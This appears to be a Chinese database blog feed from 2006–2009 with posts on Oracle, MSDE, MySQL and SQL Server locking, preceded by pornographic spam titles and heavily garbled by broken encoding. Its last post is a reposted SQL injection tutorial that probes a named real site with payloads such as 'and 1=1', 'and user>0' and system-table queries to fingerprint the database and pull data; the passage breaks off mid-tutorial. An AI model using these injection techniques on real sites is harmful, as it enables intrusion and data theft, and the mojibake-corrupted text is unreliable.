亚洲午夜久久久久久久久电影网 ,亚洲av无码成人精品区一本二本,亚洲欧洲校园自拍都市

freebird — Mon, 03 Aug 2009 10:12:00 GMT

摘要: l 前言

对于oracle的内存的��理�Q�截止到9iR2�Q�都是相当重要的环节�Q�管理不善，��可能给数据库带来严重的性能问题。下面我们将一步一步就内存��理的各个方面进行探讨�?

阅读全文

freebird 2009-08-03 18:12 发表评论

freebird — Sun, 02 Aug 2009 07:39:00 GMT

摘要: 6.2 参考资料：Oracle数据库移动方�?
�q�里所指“数据库�U�d��”是��Oracle数据文�g�Q�系�l�数据文件或用户数据文�g�Q�、控制文件、重做日志移动至新的存储路径�Q��ƈ修改Oracle相关配置�Q��之可以重新正常启动。这�U�应用常见于�pȝ��扩容后的Oracle数据存储路径的调整�?
以下面�ؓ例，�U�d��pȝ��表空间的相关文�g位置�Q��ƈ重新配置Oracle。假讑֎�存储路径�?oradata�Q�新存储路径�?oratest�?
6.2.1 �U�d��数据库文�?
1�Q?获取数据库相关信�?
查看一下数据库的文件内容：
sqlplus /nolog
SQL> connect /as sysdba
SQL> select * from v$datafile;
SQL> select * from v$controlfile
SQL> select * from v$logfile; 阅读全文

freebird 2009-08-02 15:39 发表评论

freebird — Sat, 01 Aug 2009 11:34:00 GMT

摘要: 1.MSDE的安�?
MSDE如果默认安装的话,实例名和机器名是一致的,同时�pȝ��的SA密码会被讄��为空.如果要对其做一些修�?可以通过修改目录下的SETUP.INI文�g来实�?其中主要涉及以下几项:
[Options]
SECURITYMODE=SQL //登陆方式,SQL表示SQL登陆
INSTANCENAME=singlewks //实例�?
DISABLENETWORKPROTOCOLS=1 //�|�络可访问�?0表示�|�络用户可访�?1表示不可�?
DATADIR="c:\singlewks\Data" //数据文�g存放位置
SAPWD=your_pwd //SA密码阅读全文

freebird 2009-08-01 19:34 发表评论

freebird — Thu, 18 Jun 2009 00:58:00 GMT

摘要: 常要oracle数据库定时的自动执行一些脚本，或做数据库备份，或做数据的提��|��或做数据库的性能优化�Q�包括重建烦引等�{�的工作,�q�时需要用��C��个函数dbms_job.submit�Q�来完成Oracle定时器Job旉��的处理上。��用dbms_job.submit�q�个函数�Q�我们只需要考虑两个事情�Q�安排某一��d��Q�和定制一个执行�Q务的旉��炏V��但最重要也是最��手的事情，我认��是确定一个执行�Q务的旉��炏V��时间点��定了，其他的事情就好办了。下面是函数dbms_job.submit使用�Ҏ(gu��)��Q? 阅读全文

freebird 2009-06-18 08:58 发表评论

freebird — Wed, 10 Jun 2009 06:18:00 GMT

摘要: 典型的查询方式�ؓ�Q?
SELECT TITLE
FROM BOOKSHELF
WHERE TITLE NOT IN
(SELECT TITLE FROM BOOKSHELF_CHECKOUT)
ORDER BY TITLE�Q?
如果BOOKSHELF_CHECKOUT很大的话�Q�速度可能会很慢，因�ؓORACLE会在BOOKSHELF_CHECKOUT上执行一个时间密集型的全表扫描�?

oracle 中not in 效率不高
阅读全文

freebird 2009-06-10 14:18 发表评论

freebird — Tue, 26 May 2009 03:54:00 GMT

摘要: 1 MySQL支持enum,和set�c�d��Q�SQL Server不支�?

2 MySQL不支持nchar,nvarchar,ntext�c�d��

3 MySQL的递增语句是AUTO_INCREMENT�Q�而MS SQL是identity(1,1)

4 MS SQL默认到处表创��句的默认��D��C�是((0)),而在MySQL里面是不允许带两括号�?

5 MySQL需要�ؓ表指定存储类�?
阅读全文

freebird 2009-05-26 11:54 发表评论

freebird — Thu, 21 May 2009 08:04:00 GMT

摘要: 讄��当前日期或时间�?Date ,Now, Time
计算日期: DateAdd, DateDiff, DatePart
�q�回日期: DateSerial, DateValue
�q�回旉��: TimeSerial, TimeValue
讄��日期或时�? Date, Time
计时: Timer
在帮助里有~
--------------------------- 阅读全文

freebird 2009-05-21 16:04 发表评论

乐观锁、�?zh��n)�观�?�Q��{�E�兴国）

freebird — Tue, 28 Apr 2009 08:06:00 GMT

摘要: B/S构架的应用越来越普及�Q�但�׃��它有别于C/S构架的特�D�性，�q�发控制始终没能得到很好的解冻I��如售��系�l�经�怼�出现同一张火车票出售多次的现象。典型的案例如下�Q?nbsp; 阅读全文

freebird 2009-04-28 16:06 发表评论

freebird — Tue, 28 Apr 2009 08:04:00 GMT

摘要: UPDLOCK
　　��d��表时使用更新锁，而不使用�׃�n锁，�q�将锁一直保留到语句或事务的�l�束。UPDLOCK 的优�Ҏ(gu��)��允许�(zh��n)�读取数据（不阻塞其它事务）�q�在以后更新数据�Q�同时确保自从上�ơ读取数据后数据没有被更攏V�?
　　�q�是SqlServer2000中对更新锁的说明. 阅读全文

freebird 2009-04-28 16:04 发表评论

freebird — Tue, 28 Apr 2009 07:55:00 GMT

摘要: 问题描述�Q?

用ADO讉K��数据库，从一个表中取一定的记录�Q�比�?0行）�Q�取出后在程序中使用�Q��用完后删除掉记录�Q�不用更新或删除记录�Q�。在多用��h��作下(每个用户采用相同的操�?�Q�怎么保证一个用户已选取的记录不被其他用户选取?
阅读全文

freebird 2009-04-28 15:55 发表评论

freebird — Tue, 28 Apr 2009 05:31:00 GMT

摘要: �q�是一个很有代表性的问题�Q�在C/S�l�构的数据库应用�E�序中经常碰刎ͼ�如果�q�种问题
不能很好地解冻I��可能造成�pȝ��速度�~�慢、死锁甚臛_��溃�?nbsp; 阅读全文

freebird 2009-04-28 13:31 发表评论

MS SQL Server数据库事务锁机制分析(�?

freebird — Thu, 20 Sep 2007 00:57:00 GMT

锁是�|�络数据库中的一个非帔R��要的概念�Q�它主要用于多用��L��境下保证数据库完整性和一致性。各�U�大型数据库所采用的锁的基本理论是一致的�Q�但在具体实��C��各有差别。目前，大多数数据库��理�pȝ��都或多或��具有自我调节、自我管理的功能�Q�因此很多用户实际上不清楚锁的理论和所用数据库中锁的具体实现�?

Microsoft SQL Server�Q�以下简�U�SQL Server�Q�作��Z��U�中��型数据库管理系�l�，已经得到了广泛的应用�Q�该�pȝ��更强调由�pȝ��来管理锁。在用户有SQL��h��Ӟ��pȝ��分析��h��Q�自动在满��锁定条�g和系�l�性能之间为数据库加上适当的锁�Q�同时系�l�在�q�行期间常常自动�q�行优化处理�Q�实行动态加锁。对于一般的用户而言�Q�通过�pȝ��的自动锁定管理机制基本可以满��用要求，但如果对数据安全、数据库完整性和一致性有�Ҏ(gu��)��要求�Q�就必须自己控制数据库的锁定和解锁，�q�就需要了解SQL Server的锁机制�Q�掌握数据库锁定�Ҏ(gu��)��?

锁的多粒度性以及锁升��

数据库中的锁是指一�U��Y件机�Ӟ��用来指示某个用户�Q�也卌��E�会话，下同�Q�已�l�占用了某种资源�Q�从而防止其他用户做出媄响本用户的数据修�Ҏ(gu��)��D��数据库数据的非完整性和非一致性。这儿所谓资源，主要指用户可以操作的数据行、烦引以及数据表�{�。根据资源的不同�Q�锁有多�_�度�Q�multigranular�Q�的概念�Q�也��是指可以锁定的资源的层�ơ。SQL Server中能够锁定的资源�_�度包括�Q�数据库、表、区域、页面、键��|��指带有烦引的行数据）、行标识�W�（RID�Q�即表中的单行数据）�?

采用多粒度锁的重要用途是用来支持�q�发操作和保证数据的完整性。SQL Server�Ҏ(gu��)��用户的请求，做出分析后自动给数据库加上合适的锁。假设某用户只操作一个表中的部分行数据，�pȝ��可能会只��d��几个行锁�Q�RID�Q�或��面锁，�q�样可以��可能多地支持多用户的�ƈ发操作。但是，如果用户事务中频�J�对某个表中的多条记录操作，��导致对该表的许多记录行都加上了行��锁，数据库系�l�中锁的数目会急剧增加�Q�这样就加重了系�l�负��P��影响�pȝ��性能。因此，在数据库�pȝ��中，一般都支持锁升�U?lock escalation)。所谓锁升��是指调整锁的�_�度�Q�将多个低粒度的锁替换成��数的更高粒度的锁，以此来降低系�l�负荗��在SQL Server中当一个事务中的锁较多�Q�达到锁升��门限�Ӟ��pȝ��自动��行�U�锁和页面锁升��U�锁。特别值得注意的是�Q�在SQL Server中，锁的升��门限以及锁升�U�是��q��l�自动来��定的，不需要用戯��|��?

锁的模式和兼�Ҏ(gu��)�?

在数据库中加锁时�Q�除了可以对不同的资源加锁，�q�可以��用不同程度的加锁方式�Q�即锁有多种模式�Q�SQL Server中锁模式包括�Q?

1�Q�共享锁

SQL Server中，�׃�n锁用于所有的只读数据操作。共享锁是非独占的，允许多个�q�发事务��d��光��定的资源。默认情况下�Q�数据被��d��后，SQL Server立即释放�׃�n锁。例如，执行查询“SELECT * FROM my_table”时�Q�首先锁定第一��，��d��之后�Q�释攑֯��W�一��늚�锁定�Q�然后锁定第二页。这��P��允许在��L��作过�E�中�Q�修�Ҏ(gu��)��被锁定的�W�一��c��但是，事务隔离�U�别�q�接选项讄��和SELECT语句中的锁定讄��都可以改变SQL Server的这�U�默认设�|�。例如，�?SELECT * FROM my_table HOLDLOCK”就要求在整个查询过�E�中�Q�保持对表的锁定�Q�直到查询完成才释放锁定�?

2�Q�修攚w��

修改锁在修改操作的初始化阶段用来锁定可能要被修改的资源，�q�样可以避免使用�׃�n锁造成的死锁现象。因��Z��用共享锁�Ӟ��修改数据的操作分��Z��步，首先获得一个共享锁�Q�读取数据，然后��共享锁升��为独占锁�Q�然后再执行修改操作。这样如果同时有两个或多个事务同时对一个事务申请了�׃�n锁，在修�Ҏ(gu��)��据的时候，�q�些事务都要��共享锁升��为独占锁。这�Ӟ��q�些事务都不会释攑օ�享锁而是一直等待对斚w��放，�q�样��造成了死锁。如果一个数据在修改前直接申请修攚w��Q�在数据修改的时候再升��为独占锁�Q�就可以避免死锁。修攚w��与共享锁是兼容的�Q�也��是说一个资源用�׃�n锁锁定后�Q�允许再用修攚w��锁定�?

3�Q�独占锁

独占锁是��Z��Ҏ(gu��)��据而保留的。它所锁定的资源，其他事务不能��d��也不能修攏V��独占锁不能和其他锁兼容�?

4�Q�结构锁

�l�构锁分为结构修攚w��Q�Sch-M�Q�和�l�构�E�_��锁（Sch-S�Q�。执行表定义语言操作�Ӟ��SQL Server采用Sch-M锁，�~�译查询�Ӟ��SQL Server采用Sch-S锁�?

5�Q�意向锁

意向锁说明SQL Server有在资源的低层获得共享锁或独占锁的意向。例如，表��的共享意向锁说明事务意图��独占锁释放到表中的��|��者行。意向锁又可以分为共享意向锁、独占意向锁和共享式独占意向锁。共享意向锁说明事务意图在共享意向锁所锁定的低层资源上攄��׃�n锁来��d��数据。独占意向锁说明事务意图在共享意向锁所锁定的低层资源上攄��独占锁来修改数据。共享式独占锁说明事务允许其他事务��用共享锁来读取顶层资源，�q�意囑֜�该资源低层上攄��独占锁�?

6�Q�批量修攚w��

扚w��复制数据时��用批量修攚w��。可以通过表的TabLock提示或者��用系�l�存储过�E�sp_tableoption的“table lock on bulk load”选项讑֮�扚w��修改锁�?

另外�Q�SQL Server命��o语句操作会媄响锁定的方式�Q�语句的�l�合也同栯��产生不同的锁定，详情如下表：

锁冲�H�及光��止办�?

在数据库�pȝ��中，死锁是指多个用户�Q�进�E�）分别锁定了一个资源，�q�又试图��h��锁定�Ҏ(gu��)��已经锁定的资源，�q�就产生了一个锁定请求环�Q�导致多个用��P��q�程�Q�都处于�{�待�Ҏ(gu��)��释放所锁定资源的状态�?

在SQL Server中，�pȝ��能够自动定期搜烦和处理死锁问题。系�l�在每次搜烦中标识所有等待锁定请求的�q�程会话�Q�如果在下一�ơ搜索中该被标识的进�E�仍处于�{�待状态，SQL Server��开始递归死锁搜烦�?

(上接�W�D21�? 当搜索检��到锁定��h��环时�Q�系�l�将�Ҏ(gu��)��各进�E�会话的死锁优先�U�别来结束一个优先��最低的事务�Q�此后，�pȝ��回滚该事务，�q�向该进�E�发�?205号错误信息。这��P��其他事务��有可能�l�箋�q�行了。死锁优先��的设�|�语句�ؓ�Q?

SET DEADLOCK_PRIORITY { LOW | NORMAL}

其中LOW说明该进�E�会话的优先�U�较低，在出现死锁时�Q�可以首先中断该�q�程的事务。另外，各进�E�中通过讄��LOCK_TIMEOUT选项能够讄��q�程处于锁定��h��状态的最长等待时间。该讄��的语句：

SET LOCK_TIMEOUT { timeout_period }

其中�Q�timeout_period以毫�U��ؓ单位�?

理解了死锁的概念�Q�在应用�E�序中就可以采用下面的一些方法来��量避免死锁了：

�Q?�Q�合理安排表讉K��序�?

�Q?�Q�在事务中尽量避免用户干预，��量使一个事务处理的��d��些�?

�Q?�Q�采用脏��L��术。脏�ȝ��于不对被讉K��的表加锁�Q�而避免了锁冲�H�。在客户�?服务器应用环境中�Q�有些事务往往不允许读脏数据，但在特定的条件下�Q�我们可以用脏读�?

�Q?�Q�数据访问时域离散法。数据访问时域离散法是指在客��h��/服务器结构中�Q�采取各�U�控制手�D�|��制对数据库或数据库中的对象访问时间段。主要通过以下方式实现: 合理安排后台事务的执行时��_��采用工作��对后台事务�q�行�l�一��理。工作流在管理�Q务时�Q�一斚w��限制同一�c�M�Q务的�U�程敎ͼ�往往限制�?个）�Q�防止资源过多占�? 另一斚w��合理安排不同��d��执行时序、时��_��量避免多个后台��d��同时执行�Q�另外，避免在前��C��易高峰时间运行后��C�Q务�?

�Q?�Q�数据存储空间离散法。数据存储空间离散法是指采取各种手段�Q�将逻辑上在一个表中的数据分散到若�q�离散的�I�间上去�Q�以便改善对表的讉K��性能。主要通过以下�Ҏ(gu��)��实现: �W�一�Q�将大表按行或列分解��q�小�? �W�二�Q�按不同的用��L��分解�?

�Q?�Q��用尽可能低的隔离性��别。隔��L��别是指�ؓ保证数据库数据的完整性和一致性而��多用户事务隔��ȝ��E�度�Q�SQL92定义�?�U�隔��L��别：未提交读、提交读、可重复��d��可串行。如果选择�q�高的隔��L��别，如可串行�Q�虽然系�l�可以因实现更好隔离性而更大程度上保证数据的完整性和一致性，但各事务间冲�H�而死锁的��Z��大大增加�Q�大大媄响了�pȝ��性能�?

�Q?�Q��用Bound Connections。Bound connections 允许两个或多个事务连接共享事务和锁，而且��M��一个事务连接要甌��锁如同另外一个事务要甌��锁一��P��因此可以允许�q�些事务�׃�n数据而不会有加锁的冲�H��?

�Q?�Q�考虑使用乐观锁定或��事务首先获得一个独占锁定。一个最常见的死锁情况发生在�p�d��L��成器中，它们通常是这��L��写的�Q?

begin tran

select new_id from keytab holdlock

update keytab set new_id�Q�new_id+l

commit tran

如果有两个用户在同时�q�行�q�一事务�Q�他们都会得到共享锁定�ƈ保持它。当两个用户都试囑־�到keytab表的独占锁定�Ӟ��׃��q�入死锁。�ؓ了避免这�U�情�늚�发生�Q�应��上�q�C��务重写成如下形式�Q?

begin tran

update keytab set new_id=new_id+l

select new_id from keytab

commit tran

以这�U�方式改写后�Q�只有一个事务能得到keytab的独占锁定，其他�q�程必须�{�到�W�一个事务的完成�Q�这栯��增加了执行时��_��但避免了死锁�?

如果要求在一个事务中��h��d��的可重复能力�Q�就要考虑以这�U�方式来�~�写事务�Q�以获得资源的独占锁定，然后再去��L��据。例如，如果一个事务需要检索出titles表中所有书的��^均�h(hu��n)��|��q�保证在update被应用前�Q�结果不会改变，优化器就会分配一个独占的表锁定。考虑如下的SQL代码�Q?

begin tran

update titles set title_idid�Q�title_id �Q?

where 1�Q?

if (selectavg(price)fromtitles)>$15

begin

/* perform some additional processing */

end

update titles set price�Q�price*1.10

where price<(select avg(price)from titles)

commit tran

在这个事务中�Q�重要的是没有其他进�E�修改表中�Q何行的price�Q�或者说在事务结束时��索的��g��事务开始时��索的��g��同。这里的where子句看�v来很奇怪，但是不管你相信与否，�q�是�q�今为止优化器所遇到的最完美有效的where子句�Q�尽��计��出的结果��L��false。当优化器处理此查询�Ӟ��因�ؓ它找不到��M��有效的SARG�Q�它的查询规划就会强制��用一个独占锁定来�q�行表扫描。此事务执行�Ӟ��where子句立即得到一个false��|��于是不会执行实际上的扫描�Q�但此进�E�仍得到了一个独占的表锁定�?

因�ؓ此进�E�现在已有一个独占的表锁�Q�所以可以保证没有其他事务会修改��M��数据行，能进行重复读�Q�且避免了由于holdlock所引�v的潜在性死锁。但是，要避免死锁，不可能不付出代�h(hu��n)。在使用表锁定来��可能地减少死锁的同�Ӟ��也增加了对表锁定的争用。因此，在实现这�U�方法之前，你需要权衡一下：避免死锁是否比允许�ƈ发地对表�q�行讉K��更重要�?

手工加锁

SQL Server�pȝ��中徏议让�pȝ��自动��理锁，该系�l�会分析用户的SQL语句要求�Q�自动�ؓ该请求加上合适的锁，而且在锁的数目太多时�Q�系�l�会自动�q�行锁升�U�。如前所�q�ͼ�升��的门限由�pȝ��自动配置�Q��ƈ不需要用户配�|��?

在实际应用中�Q�有时�ؓ了应用程序正��运行和保持数据的一致性，必须��Zؓ地给数据库的某个表加锁。比如，在某应用�E�序的一个事务操作中�Q�需要根据一�~�号对几个数据表做统计操作，��Z��证统计数据时间的一致性和正确性，从统计第一个表开始到全部表结束，其他应用�E�序或事务不能再对这几个表写入数据，�q�个时候，该应用程序希望在从统计第一个数据表开始或在整个事务开始时能够��q��序�h为地�Q�显式地�Q�锁定这几个表，�q�就需要用到手工加锁（也称昑ּ�加锁�Q�技术�?

在SQL Server 的SQL语句�Q�SELECT、INSERT、DELETE、UPDATE�Q�支持显式加锁。这4个语句在昑ּ�加锁的语法上�c�M��Q�下面仅以SELECT语句��Z��l�出语法�Q?

SELECT FROM [ WITH ]

其中�Q�指需要在该语句执行时��d��在该表上的锁�c�d��。所指定的锁�c�d��有如下几�U�：

1�Q�HOLDLOCK: 在该表上保持�׃�n锁，直到整个事务�l�束�Q�而不是在语句执行完立即释放所��d��的锁�?

2�Q�NOLOCK�Q�不��d��׃�n锁和排它锁，当这个选项生效后，可能��d��未提交读的数据或“脏数据”，�q�个选项仅仅应用于SELECT语句�?

3�Q?PAGLOCK�Q�指定添加页面锁�Q�否则通常可能��d��表锁�Q��?

4�Q�READCOMMITTED�Q�设�|�事务�ؓ��L��交隔��L��别�?

5�Q�READPAST: 跌��已经加锁的数据行�Q�这个选项��事务��d��数据时蟩�q�那些已�l�被其他事务锁定的数据行�Q�而不是阻塞直到其他事务释��N��Q�READPAST仅仅应用于READ COMMITTED隔离性��别下事务操作中的SELECT语句操作�?

6�Q�READUNCOMMITTED�Q�等同于NOLOCK�?

7�Q�REPEATABLEREAD�Q�设�|�事务�ؓ可重复读隔离性��别�?

8�Q�ROWLOCK�Q�指定��用行�U�锁�?

9�Q�SERIALIZABLE�Q�设�|�事务�ؓ可串行的隔离性��别�?

10�Q�TABLOCK�Q�指定��用表�U�锁�Q�而不是��用行�U�或��面�U�的锁，SQL Server在该语句执行完后释放�q�个锁，而如果同时指定了HOLDLOCK�Q�该锁一直保持到�q�个事务�l�束�?

11�Q�TABLOCKX�Q�指定在表上使用排它锁，�q�个锁可以阻止其他事务读或更新这个表的数据，直到�q�个语句或整个事务结束�?

12�Q?UPDLOCK �Q�指定在读表中数据时讄��修改锁（update lock�Q�而不是设�|�共享锁�Q�该锁一直保持到�q�个语句或整个事务结束，使用UPDLOCK的作用是允许用户先读取数据（而且不阻塞其他用戯��数据�Q�，�q�且保证在后来再更新数据�Ӟ��q�一�D�|��间内�q�些数据没有被其他用户修攏V�?

�׃��可见�Q�在SQL Server中可以灵�z�d��样地为SQL语句昑ּ�加锁�Q�若适当使用�Q�我们完全可以完成一些程序的�Ҏ(gu��)��要求�Q�保证数据的一致性和完整性。对于一般��用者而言�Q�了解锁机制�q�不意味着必须使用它。事实上�Q�SQL Server��让系�l�自动管理数据库中的锁，而且一些关于锁的设�|�选项也没有提供给用户和数据库��理人员�Q�对于特�D�用��P��通过�l�数据库中的资源昑ּ�加锁�Q�可以满��_��高的数据一致性和可靠性要求，只是需要特别注意避免死锁现象的出现�?

哦﹐��單��一下﹐如果你��用where語句��update�Q�delete�{�操作進行限制�H�如果修改了一條﹐有可能會使用行鎖�Q�行鎖分RID與KID�H�如果有索引�H�SQL產生的是KID�H�如何沒有就會產生RID�H�都是鎖定一行﹔如果更新涉及行數較多�H�就會上升為頁面鎖（每頁8K�Q�或表鎖�?/font>

freebird 2007-09-20 08:57 发表评论

如何解决孤立用户问题

freebird — Tue, 31 Jul 2007 06:49:00 GMT

摘要: 阅读全文

freebird 2007-07-31 14:49 发表评论

not in 失效

freebird — Fri, 09 Mar 2007 09:05:00 GMT

摘要: 像SQL语句 select * from t1 where f1 not in (select f1 from t2) �q�是去除t1表中包括t2中数据的语句�?
如果在t2中的f1字段中有null值的话，则查不到�l�果。也��是说在not in 双��的集合中不能有null��|��
而在not in左边有null值没有问题�? 阅读全文

freebird 2007-03-09 17:05 发表评论

[转帖]深入��出理解索引�l�构

freebird — Thu, 24 Aug 2006 03:10:00 GMT

摘要: �? �? : 转：�Q�一�Q? �? �? : freedk ( 书生 ... 阅读全文

freebird 2006-08-24 11:10 发表评论

itpub�W�记�Q�字�W�串分割

freebird — Tue, 08 Aug 2006 00:40:00 GMT

有一个字�W�串: a,bc,d,abce,ddz
现在用T-SQL语句把这一字符串变成这�U�样�?
item
----------
a
bc
d
abce
ddz

(5 row(s) affected)

正解�Q?br />

declare @str varchar ( 20 ), @strSql varchar ( 8000 )
set @str = ' a,bc,d,abce,ddz ' -- 此处的字�W�串可以随心所�Ʋ的更改
if object_id ( ' tempdb.dbo.#temp1 ' ) is null
create table #temp1(item varchar ( 20 ))
else
truncate table #temp1
SELECT @strSql = ' insert into #temp1 values( ''' + REPLACE ( @str , ' , ' , ''' )
insert into #temp1 values( ''' ) + ''' ) '
print @strSql
exec ( @strSql )
select * from #temp1

知识�Q?br />1.) truncate table tableName 一�ơ删除表中的所有数据，同于delete没有where�Q�但是比delete省资源，因�ؓ占用的日志少�?br />

freebird 2006-08-08 08:40 发表评论

SQL注入天书—ASP注入漏洞全接触（转）

freebird — Sun, 30 Jul 2006 15:06:00 GMT

随着B/S模式应用开发的发展�Q��用这�U�模式编写应用程序的�E�序员也��来��多。但是由于这个行业的入门门槛不高�Q�程序员的水�q�_��l�验也参差不齐，相当大一部分�E�序员在�~�写代码的时候，没有对用戯��入数据的合法性进行判断，使应用程序存在安全隐�(zh��n)�。用户可以提交一�D�|��据库查询代码�Q�根据程序返回的�l�果�Q�获得某些他惛_��知的数据�Q�这��是所谓的SQL Injection�Q�即SQL注入�?/font>

SQL注入是从正常的WWW端口讉K��Q�而且表面看�v来跟一般的Web��面讉K��没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报�Q�如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉�?/font>

但是�Q�SQL注入的手法相当灵�z�，在注入的时候会��到很多意外的情��c��能不能�Ҏ(gu��)��具体情况�q�行分析�Q�构造��y妙的SQL语句�Q�从而成功获取想要的数据�Q�是高手与“菜鸟”的�Ҏ(gu��)��区别�?/font>

�Ҏ(gu��)��国情�Q�国内的�|�站用ASP+Access或SQLServer的占70%以上�Q�PHP+MySQ占L20%�Q�其他的不��10%。在本文�Q�我们从分入门、进阶至高��讲解一下ASP注入的方法及技巧，PHP注入的文章由NB联盟的另一位朋友zwell撰写�Q�希望对安全工作者和�E�序员都有用处。了解ASP注入的朋友也请不要蟩�q�入门篇�Q�因为部分�h�Ҏ(gu��)��入的基本判断�Ҏ(gu��)��q�存在误区。大家准备好了吗�Q�Let's Go...

�?�?��?/font>

如果你以前没试过SQL注入的话�Q�那么第一步先把IE菜单=>工具=>Internet选项=>高��=>昄��友好 HTTP 错误信息前面的勾��L��。否则，不论服务器返回什么错误，IE都只昄��为HTTP 500服务器错误，不能获得更多的提�C�Z��息�?/font>

�W�一节、SQL注入原理

以下我们从一个网�?/font> www.19cn.com 开始（注：本文发表前已征得该站站长同意�Q�大部分都是真实数据�Q��?/font>

在网站首��上�Q�有名�ؓ“IE不能打开新窗口的多种解决�Ҏ(gu��)��”的链接�Q�地址为： http://www.19cn.com/showdetail.asp?id=49 �Q�我们在�q�个地址后面加上单引�?�Q�服务器会返回下面的错误提示�Q?/font>

Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误在查询表辑ּ� 'ID=49'' 中�?

/showdetail.asp�Q�行8

从这个错误提�C�我们能看出下面几点�Q?/font>

1.�|�站使用的是Access数据库，通过JET引擎�q�接数据库，而不是通过ODBC�?/font>

2.�E�序没有判断客户端提交的数据是否�W�合�E�序要求�?/font>

3.该SQL语句所查询的表中有一名�ؓID的字�D�c�?/font>

从上面的例子我们可以知道�Q�SQL注入的原理，��是从客��L��提交�Ҏ(gu��)��的代码，从而收集程序及服务器的信息�Q�从而获取你惛_��得到的资料�?/font>

�W�二节、判断能否进行SQL注入

看完�W�一节，有一些�h会觉得：我也是经常这��h��试能否注入的�Q�这不是很简单吗�Q?/font>

其实�Q�这�q�不是最好的�Ҏ(gu��)��Q��ؓ什么呢�Q?/font>

首先�Q�不一定每台服务器的IIS都返回具体错误提�C�给客户端，如果�E�序中加了cint(参数)之类语句的话�Q�SQL注入是不会成功的�Q�但服务器同样会报错�Q�具体提�C�Z��息�ؓ处理 URL 时服务器上出错。请和系�l�管理员联络�?/font>

其次�Q�部分对SQL注入有一点了解的�E�序员，认�ؓ只要把单引号�q��o掉就安全了，�q�种情况不�ؓ��数�Q�如果你用单引号��试�Q�是��不到注入点�?/font>

那么�Q�什么样的测试方法才是比较准��呢�Q�答案如下：
�? http://www.19cn.com/showdetail.asp?id=49

�? http://www.19cn.com/showdetail.asp?id=49 and 1=1

�? http://www.19cn.com/showdetail.asp?id=49 and 1=2

�q�就是经典的1=1�?=2��试法了�Q�怎么判断呢？看看上面三个�|�址�q�回的结果就知道了：

可以注入的表玎ͼ�

�?正常昄��Q�这是必然的�Q�不然就是程序有错误了）

�?正常昄��Q�内容基本与①相�?/font>

�?提示BOF或EOF�Q�程序没做�Q何判断时�Q�、或提示找不到记录（判断了rs.eof�Ӟ��、或昄��内容为空�Q�程序加了on error resume next�Q?/font>

不可以注入就比较�Ҏ(gu��)��判断了，①同��h��常显�C�，②和③一般都会有�E�序定义的错误提�C�，或提�C�类型�{换时出错�?/font>

　　当然�Q�这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字�W�型和搜索型参数�Q�我��在中�񔽋�的“SQL注入一般步骤”再做分析�?/font>

�W�三节、判断数据库�c�d��及注入方�?/font>

不同的数据库的函数、注入方法都是有差异的，所以在注入之前�Q�我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer�Q�网上超�q?9%的网站都是其中之一�?/font>

怎么让程序告诉你它��用的什么数据库呢？来看看：

SQLServer有一些系�l�变量，如果服务器IIS提示没关闭，�q�且SQLServer�q�回错误提示的话�Q�那可以直接从出错信息获取，�Ҏ(gu��)��如下�Q?/font>

http://www.19cn.com/showdetail.asp?id=49 and user>0

�q�句语句很简单，但却包含了SQLServer�Ҏ(gu��)��注入�Ҏ(gu��)��的精髓，我自�׃��是在一�ơ无意的��试中发现这�U�效率极高的猜解�Ҏ(gu��)��。让我看来看看它的含义：首先�Q�前面的语句是正常的�Q�重点在and user>0�Q�我们知道，user是SQLServer的一个内�|�变量，它的值是当前�q�接的用户名�Q�类型�ؓnvarchar。拿一个nvarchar的��D��int的数0比较�Q�系�l�会先试囑ְ�nvarchar的��D�{成int型，当然�Q��{的过�E�中肯定会出错，SQLServer的出错提�C�是�Q�将nvarchar�?”abc�?转换数据�c�d��?int 的列时发生语法错误，呵呵�Q�abc正是变量user的��|��q�样�Q�不废吹��C��力就拿到了数据库的用户名。在以后的篇�q�里�Q�大家会看到很多用这�U�方法的语句�?/font>

��Z��说几句，众所周知�Q�SQLServer的用户sa是个�{�同Adminstrators权限的角�Ԍ��拿到了sa权限�Q�几乎肯定可以拿��C��机的Administrator了。上面的�Ҏ(gu��)��可以很方便的��试出是否是用sa��d��Q�要注意的是�Q�如果是sa��d��Q�提�C�是��”dbo”�{换成int的列发生错误�Q�而不是”sa”�?

如果服务器IIS不允许返回错误提�C�，那怎么判断数据库类型呢�Q�我们可以从Access和SQLServer和区别入手，Access和SQLServer都有自己的系�l�表�Q�比如存放数据库中所有对象的表，Access是在�pȝ��表[msysobjects]中，但在Web环境下读该表会提�C�“没有权限”，SQLServer是在表[sysobjects]中，在Web环境下可正常��d��?/font>

在确认可以注入的情况下，使用下面的语句：

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

如果数据库是SQLServer�Q�那么第一个网址的页面与原页�?/font> http://www.19cn.com/showdetail.asp?id=49 是大致相同的�Q�而第二个�|�址�Q�由于找不到表msysobjects�Q�会提示出错�Q�就��程序有定w��处理�Q�页面也与原��面完全不同�?/font>

如果数据库用的是Access�Q�那么情况就有所不同�Q�第一个网址的页面与原页面完全不同；�W�二个网址�Q�则视乎数据库设�|�是否允许读该系�l�表�Q�一般来说是不允许的�Q�所以与原网址也是完全不同。大多数情况下，用第一个网址��可以得知系�l�所用的数据库类型，�W�二个网址只作为开启IIS错误提示时的验证�?/font>

�q?�?��?/font>

在入门篇�Q�我们学会了�Q�I��Q�注入的判断�Ҏ(gu��)��Q�但真正要拿到网站的保密内容�Q�是�q�远不够的。接下来�Q�我们就�l�箋学习如何从数据库中获取想要获得的内容�Q�首先，我们先看看Ｓ�Q�Ｌ注入的一般步骤：

�W�一节、Ｓ�Q�Ｌ注入的一般步�?/font>

首先�Q�判断环境，��L��注入点，判断数据库类型，�q�在入门��已�l�讲�q�了�?/font>

其次�Q�根据注入参数类型，在脑��中重构SQL语句的原貌，按参数类型主要分��Z��面三�U�：

(A) ID=49 �q�类注入的参数是数字型，SQL语句原貌大致如下�Q?br />Select * from 表名 where 字段=49
注入的参��CؓID=49 And [查询条�g]�Q�即是生成语句：
Select * from 表名 where 字段=49 And [查询条�g]

(B) Class=�q�箋�?�q�类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连�l�剧�?
注入的参��CؓClass=�q�箋剧�?and [查询条�g] and ‘�?�?�Q�即是生成语句：
